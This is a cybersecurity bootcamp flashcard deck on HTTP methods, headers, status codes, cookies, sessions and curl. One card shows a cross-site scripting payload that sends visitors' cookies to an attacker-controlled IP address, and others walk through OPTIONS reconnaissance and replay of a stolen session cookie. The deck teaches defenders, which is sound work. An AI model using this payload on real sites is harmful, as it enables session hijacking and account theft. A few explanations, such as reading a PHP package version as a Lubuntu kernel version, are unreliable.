Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

ag-Cybersecurity Bootcamp Study Aid > 14.1 HTTP with Session and Cookies > Flashcards

14.1 HTTP with Session and Cookies Flashcards

1
Q

Securing the web requires in-depth knowledge of what topics? (4)

A
  1. Client-server architecture
  2. HyperText Transfer Protocol (HTTP)
  3. HTTP requests
  4. HTTP responses
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

The client-server model is an exchange of information, a cycle of _______ and _______ between ______ and ________.

A

The client-server model is an exchange of information, a cycle of requests and responses between clients and servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Clients and servers use the _______ to communicate on the web.

A

Clients and servers use the HTTP protocol to communicate on the web.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

HTTP is what layer of OSI model?

A

Layer 7 Application

HTTP is used to transfer web pages, static assets such as images and HTML/markup files, and raw data, such as MP4 video or MP3 audio.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

There are various types of requests, known as ________, which indicate the specific actions between the client and server.

A

There are various types of requests, known as HTTP methods, which indicate the specific actions between the client and server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What are the three main various HTTP methods?

A
  1. A user requests data from a server:

Ex. I’d like to see my friend’s photos on Facebook.

  1. A user gives data to a server:

Ex. Here are my credentials for my LinkedIn account.

  1. A user updates data already existing on a server:

Ex. Two new accounts have been added to the employee directory database.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What are all the various HTTP methods? (6)

A
  1. GET - Requests data from a server.
  2. POST - Sends data to a source, often changing or updating a server.
  3. PUT - Replaces current data with the new value.
  4. DELETE - Deletes a specified resource.
  5. CONNECT - Establishes a tunnel to the server.
  6. OPTIONS - Lists the communication options for target resource.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is an example of a GET request?

A

When you open a browser and go to amazon.com, the HTTP client (your browser) asks to GET the data that the URL (amazon.com) points to. That data is the webpage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is an example of a POST request?

A

Once your browser goes to amazon.com, you need to log into your Amazon account. The client sends a POST request that contains your credentials for logging in.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What’s the whitespace mean in a request?

A

Whitespace is a blank line indicating the end of the request.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

______ is a command-line client that allows us to send data to and from servers. This allows security professionals to:(4)

A

curl

  1. Test web server security configurations.
  2. Ensure web servers don’t leak sensitive data through their HTTP responses.
  3. Verify that servers only respond to certain types of requests.
  4. Look for vulnerabilities on a web server.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

HTTP resources are inherently ________, meaning that when your browser requests a web page, the webpage can’t distinguish you from others.

A

stateless

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

True or Flase: Websites need a way to deliver content that is specific to each user. To do so, they establish sessions with cookies.

A

True Cookies are small pieces of text data that, when sent by an HTTP server’s response header, are saved by the user’s HTTP client.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

HTTP requests are sent from an ______ to an ______

A

HTTP requests are sent from an HTTP client to an HTTP server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

_______ are sent back from the ________ as a response to the client

A

HTTP responses are sent back from the HTTP servers as a response to the client

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

HTTP requests include: (3)

A
  1. Request line
  2. Request header
  3. Optional request body
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

HTTP responses include: (3)

A
  1. Status line
  2. Response header
  3. Usually a response body
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Explain query parameters:

A

Query parameters allow you to be specific about the parts of a resource you want to send or receive data from.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Explain the PUT method:

A

PUT requests also send data to an HTTP server, but are often used to overwrite resources, such as updating a part of a webpage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Explain the DELETE method

A

The DELETE method deletes the specified resource from the server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Explain the CONNECT method:

A

The CONNECT method establishes a tunnel to the server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Explain the OPTIONS method:

A

OPTIONS requests ask an HTTP server to respond with all HTTP methods that the HTTP server is programmed to respond to.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Explain what an HTTP request looks like:

A

A **request line** contains the request method, the name of the requested resource, and the version of HTTP in use.

  • The request line can also contain **query parameters**, which the client can use to send data to the server.

**Headers** contain additional details about the requested resource. They are used to implement many actions with security implications, such as authentication and remembering user resources.

  • There are many different types of headers, and you aren’t expected to remember them all.
  • We’ll see the most common headers as we continue to explore requests and responses. Links to reference documentation will be provided, which you can use for their own research later.

**Whitespace** is a blank line indicating the end of the request.

24
Q

Once the server receives the request, explain what it returns:

A

A **status line** contains the response status code and translation, such as OK or Conflict.

**Headers** contain additional information about the response, similar to response headers.

-Whitespace (a blank line) separates the header from the response body that follows.

A **response body** contains the resource requested by the client, all of the web code and styling that your browser uses to format the page.

25
Q

Breakdown this request line:

GET /js/analytics.js HTTP/1.1

A

GET: The request method.

/js/analytics.js: The requested resource. This resource is the file path from a domain stated in the header (Host).

HTTP version 1.1: The protocol version used by the browser.

26
Q

Breakdown this header section (part 1):

Host: www.target-server.com
Connection: keep-alive

A

Host: www.target-server.com: Contains the domain name of the target server.

Connection: keep-alive: Tells the server to keep the TCP connection used for this HTTP transfer open after sending the response.

  • This allows the client-server to reuse the TCP connection for later HTTP requests.
  • The alternative is performing a TCP handshake: opening a connection, transferring the request and response, closing the connection, and repeating for each request response cycle.
  • Since HTTP usually involves a series of requests and responses, this would result in slower transfers than simply reusing the connection.
27
Q

Breakdown this header section (part 2):

Upgrade-Insecure-Request: 1
Accept: text/js, text/html. */*
Accept-Language: en-us
Accept-Encoding: qzip, deflate
User-Agent: Mozilla/4.0

A

Upgrade-Insecure-Requests: 1: Tells the server to turn this HTTP connection into HTTPS, which will encrypt the response and all further communications.

  • Accept: text/html/, text/js, */*: Tells the server that the client expects to receive a JavaScript or HTML document in response (text/html, text/js), but will accept data of any type (*/*).

User-Agent: Mozilla/4.0: Tells the server that this request is coming from a Mozilla 4.0 browser.

28
Q

What are some of the common request headers? (3)

A

**Authorization**: Contains the credentials used to authenticate a user with a server.

**Referer**: Contains the address of the previous webpage from which the currently requested page was linked. This header allows servers to identify where people are visiting from, and may use that data for analytics, logging, or optimized caching.

  • If a link from a Google search led to the current page, the referrer is Google.

**Cookie**: Contains stored HTTP cookies previously sent by the server with the **Set-Cookie** response header.

29
Q

GET requests can also request data with ________.

A

GET requests can also request data with query parameters.

Query parameters are useful for specifying which parts of a resource to receive or send data to

30
Q

The general syntax for query parameters is:

A

[path]?[firstParam]=[value]&[secondParam]=[value]

There is no limit to the number of query parameters a user can send using GET requests.

31
Q

POST requests are used to __________.

A

POST requests are used to send data to a server.

POST requests send data to an HTTP server’s resources, such as login credentials or images for a webpage.

32
Q

The structure of an HTTP POST request is similar to a GET request, but includes a _______ below the whitespace.

A

**request body**

The request body may contain information such as login credentials or a file to be uploaded. In the current example, our request body contains login credentials

33
Q

Breakdown the status line in the following HTTP request:

A

HTTP/1.1: The unencrypted protocol is in use.

200 OK: Status code showing that the request was processed properly.

34
Q

Breakdown the response headers in the following HTTP request:

A

Date: Contains a timestamp of when the response was generated.

Server: Apache/2.4.7 (Ubuntu): Indicates the server is running Apache 2.4.7 on Ubuntu.

X-Powered-By: PHP/5.5.9-lubuntu4.21: Indicates the server is running PHP version 5.5.9 on Lubuntu with kernel version 4.21.

Set-Cookie: SESSID=8toks; httponly: Tells the client to create a cookie called SESSID with the value 8toks, and that this cookie can only be set by the server with HTTP. We’ll discuss cookies and httponly in greater detail later.

Below the whitespace is the response body, which contains the source code of the resource requested in the GET request.

35
Q

What do the following status codes mean?

  • 200
  • 300
  • 400 & 404
  • 500
A

200 - codes indicate success.

300 - codes indicate multiple choices, meaning the server can respond to the request in more than one way.

  • *400 -** codes indicate client errors, meaning the client sent an improperly formatted request.
  • 404 - is a common example of a 400 code, indicating that a webpage doesn’t exist or can’t be accessed.

500 - codes indicate server errors, meaning the server application failed somehow.

36
Q

What kind of request was used here that would cause an HTTP server to tell the client all of the HTTP request methods it will respond to?

**HTTP Response 1**

HTTP
 HTTP/1.1 200 OK
 Date: Tue, 25 Sep 2018 21:21:20 GMT
 Server: Apache/2.2.21 (Unix mod\_ssl/2.2.21 OpenSSL/1.0.0k DAV/2 PHP/5.4.3)
 WWW-Authenticate: Cookie realm="fakesite"
 Allow: OPTIONS, GET, POST, HEAD, PUT
A

They used the OPTIONS method here. This was the attacker’s reconnaissance phase, where they found out all available HTTP methods that can be requested to the HTTP server.

The OPTIONS method is useful for an attacker to find out what kind of request methods they can leverage while attempting to compromise an HTTP server.

37
Q

What status code was returned in this response? What kind of method was used to generate this HTTP response? What sort of information was input to this HTTP request? What did the attacker try to do? Were they successful?

```HTTP
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Cookie realm=”fakesite”
form-action=”/login”
cookie-name=AUTH-COOKIE
Content-Type: text/html

<title>Unauthorized</title>

<form>
<br></br> <input></input><br></br> <p><label>Username: <input></input></label><br></br> </p>
<p><label>Password: <input></input></label><br></br> </p>
<p><button>Sign in</button><br></br> </p>
<p><a>Register for an account</a><br></br> </p>
</form>

```

A

401

While we don’t see the request, we can tell the attacker attempted to log into the login portal with a POST request.

The response body shows a username and password being entered into the web page. The response error status code 401 indicates an invalid authorization attempt.

While we can’t see the request, we can tell the attacker attempted to log into the login portal with a POST request. The response body shows a username and password being entered into the webpage while the response error status code 401 indicates an invalid authorization attempt.

38
Q

What type of method was used in the request? What file name was uploaded to the site, according to the request body? Based on the request method and request body, what do you think happened here?

**HTTP Request 1**

```HTTP
PUT /XSS.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.fakesite.com/blog

<script>
<br/> document.location='http://133.7.13.37/cookiestealer.php?c='+document.cookie;<br/>
</script>

```

**HTTP Response 3**

HTTP
 HTTP/1.1 201 Created
 Date: Mon, 05 May 2014 12:28:53 GMT
 Server: Apache/2.2.14 (Win32)
 Content-type: text/html
 Content-length: 30
 Connection: Closed
A

The attacker used the PUT method.

cookiestealer.php

The attacker could not inject XSS code without uploading a file with it and used the PUT method to upload a cross-site script to steal the cookies of users and send the cookies to their own server.

39
Q

Is there anything interesting about the URL requested?

**HTTP Response 4**

HTTP
 GET https://www.fakesite.com/admin HTTP/1.1
 Cookie: $Version="1"; AUTH-COOKIE="sdf354s5c1s8e1s"; $Path="/admin"
A

Looking at HTTP Request 4, it’s clear that the attacker stole a cookie and was able to log into the admin portal using a GET request with stolen cookies set in the header

40
Q

What is the most basic type of curl request and why would you need to use it?

A

curl https://somedomain.com

For example, when working through a container that
has no user interface, you’ll need a command-line tool to
send and receive HTTP requests.

41
Q

Running curl with the –head flag will only show ________ the response header.

Breakdown the follwoing response:

Ex. curl –head https://posthere.io

console
 HTTP/1.1 200 OK
 Server: nginx/1.9.2
 Date: Thu, 12 Mar 2020 06:02:20 GMT
 Content-Type: text/html
 Content-Length: 12905
 Last-Modified: Wed, 01 Jan 2020 17:09:18 GMT
 Connection: close
 ETag: "5e0cd23e-3269"
 Accept-Ranges: bytes
A

Running curl with the –head flag will only show the response header.

  • The Content-Type response header (text/html) tells our client (curl) that it is receiving a response body with the resource type HTML. This header serves the same purpose as a file name extension in your operating system.
  • The Server response header tells our browser it is connecting to an nginx web server, one of the most popular HTTP servers.
42
Q

Unlike a regular GET request, which returns the entire response body, POST requests need to __________________.

A

Unlike a regular GET request, which returns the entire response body, POST requests need to specify *where* you want to send information to.

43
Q

Breakdown this POST Request with Query Parameters:

curl -X POST https://posthere.io/f260-48d9-8e1b

A

-X: Indicates that we are using a method other than the default GET.

POST: The method we are using.

https://posthere.io/f260-48d9-8e1b: Our unique URL that the page gave us. Everyone who uses the site is given a different URL.

44
Q

Breakdown this POST Request with Plain Data:

curl -X POST -d “test data” [URL]

A

curl: The tool we are using.

-X: Indicates that we are using a different method than the default GET.

POST: The method we are using.

-d: Sends the data in a POST request to the server.

“test data”: The message we are sending.

https://posthere.io/f260-48d9-8e1b: The unique URL that the page gave us.

45
Q

How would you create a POST request to upload structured JSON data?

A

curl -X POST -d “{"jsonKey1": "jsonValue1", "jsonKey2": "jsonValue2"}” -H “Content-Type: application/json” [Your URL]

  • This command tells the server that we are sending it JSON data with the -H option, followed by “Content-Type: application/json”
46
Q

HTTP resources are inherently ______, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.

A

HTTP resources are inherently **stateless**, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.

47
Q

Websites need a way to deliver content that is specific to each user. To do so, they establish ______, with ______.

A

Websites need a way to deliver content that is specific to each user. To do so, they establish **sessions**, with **cookies**.

48
Q

Fill in the blanks:

  • A ______ contains user-specific information that is saved in order to personalize an HTTP response.
  • A ______ has information that uniquely identifies each session.
  • The cookie is created by the HTTP server and sent to an HTTP client through a _______.
  • When the HTTP server sends the client the cookie, it also sends back the __________.
  • The ______ receives the cookie, saves it, and processes the personalized response body.
  • On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a _______ and _______ can be received in return.
A
  • A session contains user-specific information that is saved in order to personalize an HTTP response.
  • A cookie has information that uniquely identifies each session.
  • The cookie is created by the HTTP server and sent to an HTTP client through a response header.
  • When the HTTP server sends the client the cookie, it also sends back the personalized response body.
  • The HTTP client receives the cookie, saves it, and processes the personalized response body.

On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a personalized response body and cookie can be received in return.

49
Q

What types of attacks are cookies vulnerable to?

A

It’s relatively difficult to reverse engineer the contents of unique session ID cookies created with modern implementations.

    • However, these cookies are still vulnerable to attacks such as cross-site scripts or man-in-the-middle attacks, which we will cover in a later unit.
  • Instead of an attacker needing to figure out how to create a cookie that looks like another user’s, they can simply steal it from them.
50
Q

A cookie is used to implement a ______.

A

A cookie is used to implement a user’s session.

51
Q

A client and server exchange cookies through _______.

A

A client and server exchange cookies through headers.

52
Q

Clients save cookies ______.

A

Clients save cookies locally.

53
Q

A client sends a cookie via the ______ , whereas a server sends a cookie via the _______.

A

A client sends a cookie via the Cookie header. A server sends a cookie via the Set-Cookie header

54
Q

Bad implementations of cookies can be ______ or ______, and cookies with modern implementations can be ______.

A

Bad implementations of cookies can be spoofed or stolen, and cookies with modern implementations can be stolen.

55
Q

Why is it important for cybersecurity professionals to know how to manage cookies with curl?

A

Web application security engineers need to repeatedly ensure cookies are both functional
and safe from tampering.

For example, you might need to request a cookie from a webpage and then test various HTTP responses using that cookie. Doing this over and over through the
browser is tedious, but can be automated with scripts.

The same concepts apply for penetration testers and hackers: curl will be used to quickly save a cookie in order to test various exploits.

For example, an HTTP server may be configured so that in order to POST data to specific pages, clients need cookies or authentication information set in their request headers that the server can verify.

56
Q

What are the two options to allows users to look through headers, send data, and authenticate to servers, and also to save and send cookies?

A

We can use the option –cookie-jar to save the
cookies set in a response header to a text file.

We can use the option –cookie to specify a text file
where a cookie is saved in order to send a request with
the cookies embedded in the request header.

ag-Cybersecurity Bootcamp Study Aid (55 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions